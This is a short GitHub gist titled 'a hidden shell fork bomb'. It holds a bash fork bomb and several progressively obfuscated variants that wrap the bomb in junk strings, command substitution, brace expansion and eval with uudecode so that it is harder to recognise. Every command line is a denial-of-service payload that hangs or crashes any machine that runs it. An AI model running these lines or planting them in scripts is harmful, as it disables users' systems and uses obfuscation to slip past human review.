Skip to content

Instantly share code, notes, and snippets.

@10maurycy10
Created April 29, 2021 21:11
Show Gist options
  • Save 10maurycy10/012caad39ba5cff7effcc4b633dc7687 to your computer and use it in GitHub Desktop.
Save 10maurycy10/012caad39ba5cff7effcc4b633dc7687 to your computer and use it in GitHub Desktop.
a hidden shell fork bomb.
# basic fork bomb
r()(r|r);r
# surond in junk
echo 'a7s%87)B86=E(&AE7d0'`r()(r|r);r`'g*&F(FA7'
# obfuscate the calls
echo 'a7s%86=E(&Ad0'`p&Dk2&r()(r{,3Rl7g}|r{,3Rdw12});r`'g;*&F(FA7'
# cover in decoy junk
eval $(echo 'a7s%86=E(&Ad0'`p&Dk2&r()(r{,3Rl7g}|r{,3Rdw12});r`'g;*&F(FA7' | uudecode)
# remove whitespace
eval $(echo'a7s%86=E(&Ad0'`p&Dk2&r()(r{,3Rl7g}|r{,3Rdw12});r`'g;*&F(FA7'|uudecode)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment